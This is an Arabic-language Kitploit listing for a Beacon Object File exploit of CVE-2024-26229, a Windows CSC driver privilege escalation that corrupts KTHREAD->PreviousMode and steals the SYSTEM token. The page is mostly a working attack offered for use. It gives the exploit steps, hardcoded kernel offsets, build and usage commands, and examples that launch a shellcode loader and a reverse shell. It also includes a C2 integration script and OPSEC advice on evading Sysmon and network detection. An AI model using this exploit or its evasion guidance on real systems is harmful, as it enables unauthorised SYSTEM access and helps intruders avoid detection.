Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-26229-BOF — CVE-2024-26229 Beacon Object File version | Kitploit
أدوات/GitHubGitHub/0xgunrunner/cve-2024-26229-bof
Privilege EscalationExploitationPost-ExploitationPenetration TestingRed TeamingPayload DevelopmentBinary Exploitation
GitHub0xgunrunner/cve-2024-26229-bof

CVE-2024-26229-BOF

CVE-2024-26229 Beacon Object File version

عرض المستودع
منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-26229 BOF

ملف كائن البيكون (BOF) لتنفيذ CVE-2024-26229 — تصعيد صلاحيات محلي عبر برنامج تشغيل CSC في ويندوز باستخدام سرقة رمز DKOM.

بناءً على RalfHacker/CVE-2024-26229-exploit، تم تحويله إلى BOF مع حل ديناميكي للدوال (DFR) للاستخدام مع أطر عمل C2 التي تدعم واجهة BOF الخاصة بـ Cobalt Strike.

كيفية العمل

  1. يفتح \Device\Mup\;Csc\.\. عبر NtCreateFile للحصول على مقبض لبرنامج تشغيل CSC
  2. يرسل IOCTL 0x001401a3 (CSC_DEV_FCB_XXX_CONTROL_FILE) مع مخزن إدخال مخصص يشير إلى KTHREAD->PreviousMode - 0x18، مما يفسد PreviousMode من UserMode إلى KernelMode
  3. مع PreviousMode = KernelMode، يمكن لـ NtWriteVirtualMemory الكتابة إلى عناوين kernel عشوائية
  4. ينسخ رمز عملية SYSTEM (PID 4) من EPROCESS->Token فوق رمز العملية الحالية (DKOM)
  5. يستعيد PreviousMode إلى UserMode
  6. يشغل البرنامج التنفيذي المحدد عبر CreateProcessA — ترث العملية الفرعية رمز SYSTEM

تصبح عملية البيكون نفسها SYSTEM بعد الخطوة 4. العملية المشغلة اختيارية — إذا فشلت CreateProcessA، يظل البيكون مرتفع الصلاحيات.

الهدف

  • نظام التشغيل: ويندوز 10 / سيرفر 2019 (بن 19041+)
  • المتطلب: برنامج تشغيل CSC مفعل (HKLM\SYSTEM\CurrentControlSet\Services\CSC → Start = 1)
  • تم التصحيح في: تحديث تراكمي أبريل 2024

إزاحات kernel (مضمنة)

الإزاحةالقيمةالهيكل
EPROCESS->Token0x4B8ويندوز 10 19041–19045 / سيرفر 2019 17763
KTHREAD->PreviousMode0x232ويندوز 10 19041–19045 / سيرفر 2019 17763

هذه الإزاحات خاصة بالإصدار. إذا كان الهدف إصدارًا مختلفًا، تحقق باستخدام WinDbg:

root@kitploit:~
dt nt!_EPROCESS Token
dt nt!_KTHREAD PreviousMode

التجميع

يتطلب mingw-w64 وملف رأس beacon.h متوافق مع إطار عمل C2 الخاص بك.

root@kitploit:~
x86_64-w64-mingw32-gcc -c -o cve-2024-26229.x64.o cve-2024-26229.c

ضع الملف المترجم .o في دليل BOF الخاص بك (مثلًا _bin/cve-2024-26229.x64.o).

الاستخدام

root@kitploit:~
cve-2024-26229 --path <exe_path> [--args "<exe_args>"]

أمثلة

تشغيل محمل مع شيل كود محلي:

root@kitploit:~
cve-2024-26229 --path C:\Users\user\loader.exe --args "--munition-local C:\Users\user\payload.bin"

تشغيل شيل عكسي:

root@kitploit:~
cve-2024-26229 --path C:\Windows\System32\cmd.exe --args "/c C:\Users\user\shell.exe"

تشغيل بدون وسائط:

root@kitploit:~
cve-2024-26229 --path C:\Users\user\beacon.exe

المخرجات المتوقعة

root@kitploit:~
[+] System EPROCESS  = 0xffff9383f3a62040
[+] Current KTHREAD  = 0xffff9383fa4df080
[+] Current EPROCESS = 0xffff9383fa9b3080
[!] DKOM: overwriting EPROCESS->Token
[+] Token replaced -- beacon process is now SYSTEM
[+] Spawned PID 2044 as SYSTEM: C:\Users\user\loader.exe --munition-local C:\Users\user\payload.bin

تكامل AdaptixC2 / AXS

سجل BOF في سكربت التمديد .axs الخاص بك:

root@kitploit:~
var cmd_cve26229 = ax.create_command(
    "cve-2024-26229",
    "CVE-2024-26229 CSC driver LPE -- DKOM token theft to SYSTEM",
    "cve-2024-26229 --path C:\\loader.exe --args \"--munition-local C:\\payload.bin\""
);
cmd_cve26229.addArgFlagString("--path", "path", "Path to executable to run as SYSTEM", "");
cmd_cve26229.addArgFlagString("--args", "args", "Arguments for the executable", "");
cmd_cve26229.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines) {
    let path = parsed_json["path"];
    let args = parsed_json["args"];

    if (!path) {
        ax.task_output(id, "Error: --path is required");
        return;
    }

    let bof_params = ax.bof_pack("cstr,cstr", [path, args]);
    let bof_path = ax.script_dir() + "_bin/cve-2024-26229." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Task: CVE-2024-26229 LPE");
});

تعبئة الوسائط هي cstr,cstr — سلسلتان منتهيتان بصفر تتوافقان مع استدعاءات BeaconDataExtract في BOF.

ملاحظات أمنية (OPSEC)

  • لا أثر في وضع المستخدم — تعمل DKOM بالكامل في ذاكرة kernel عبر PreviousMode التالف. لا ملفات مكتوبة، لا خدمات منشأة، لا تعديلات في السجل.
  • لا مؤشرات شبكية — الثغرة محلية فقط. قم بإقرانها بمحمل يقرأ الشيل كود من القرص (نمط --munition-local) بدلاً من الجلب عبر HTTP لتجنب الاكتشافات الشبكية.
  • إنشاء العملية — CreateProcessA مع CREATE_NO_WINDOW. العملية المشغلة ترث رمز SYSTEM. إذا كان المحمل الخاص بك يحقن في عملية أخرى (مثل svchost.exe)، يمكن تنظيف المحمل من القرص بعد ذلك.
  • Sysmon — استدعاء NtCreateFile إلى \Device\Mup\;Csc\.\. و IOCTL لا يتم تسجيلهما عادة في تكوينات Sysmon الافتراضية. استدعاء CreateProcessA سيولد حدث إنشاء عملية قياسي (Event ID 1) — تأكد من أن الملف الثنائي المشغل غير ممضى عليه.
  • استعادة PreviousMode — يستعيد BOF قيمة PreviousMode إلى UserMode بعد نسخ الرمز. تستمر عملية البيكون في العمل بشكل طبيعي بعد الاستغلال.

القيود

  • x64 فقط — الإزاحات المحسوبة وعمليات المؤشر تفترض نظام 64 بت
  • الإزاحات خاصة بالإصدار — القيم المضمنة EPROCESS->Token (0x4B8) و KTHREAD->PreviousMode (0x232) صالحة لويندوز 10 19041–19045 وسيرفر 2019 17763. الإصدارات الأخرى قد تتطلب تعديل.
  • يجب أن يكون برنامج تشغيل CSC مفعلًا — تحقق باستخدام sc query csc أو السجل HKLM\SYSTEM\CurrentControlSet\Services\CSC (Start = 1). البرنامج مفعل افتراضيًا على محطات العمل ولكن قد يكون معطلًا على الخوادم.
  • استخدام واحد لكل عملية — تقوم DKOM بتعديل رمز EPROCESS الخاص بالبيكون نفسه. تشغيل BOF مرتين في نفس البيكون غير ضروري (بالفعل SYSTEM).

الشكر

  • RalfHacker — الاستغلال المستقل الأصلي
  • Natel — الاختبار والمراجعة

المراجع

  • CVE-2024-26229 — MITRE
  • تنبيه أمان مايكروسوفت

إخلاء مسؤولية قانوني

هذه الأداة مخصصة فقط لاختبار الاختراق المصرح به والبحث الأمني.

استخدام هذه الأداة ضد أنظمة لا تملكها أو ليس لديك إذن كتابي صريح لاختبارها غير قانوني بموجب القانون الفيتنامي، بما في ذلك على سبيل المثال لا الحصر:

  • Luật An toàn thông tin mạng 2015 (قانون أمن معلومات الشبكات، رقم 86/2015/QH13) — يحظر الوصول غير المصرح به إلى أنظمة المعلومات
  • Bộ luật Hình sự 2015, sửa đổi 2017 (القانون الجنائي، المواد 225–226) — يجرم التسلل غير المصرح به إلى شبكات الحاسوب وتدمير البيانات

هذه الأداة مقدمة لأغراض تعليمية فقط. المؤلف لا يتحمل أي مسؤولية عن سوء الاستخدام. أنت المسؤول الوحيد عن ضمان امتثال استخدامك لجميع القوانين المحلية والوطنية والدولية المعمول بها.

باستخدام هذه الأداة فإنك تؤكد أنك حصلت على التصريح المناسب من مالك النظام قبل أي نشاط اختباري.

تنزيل الأداة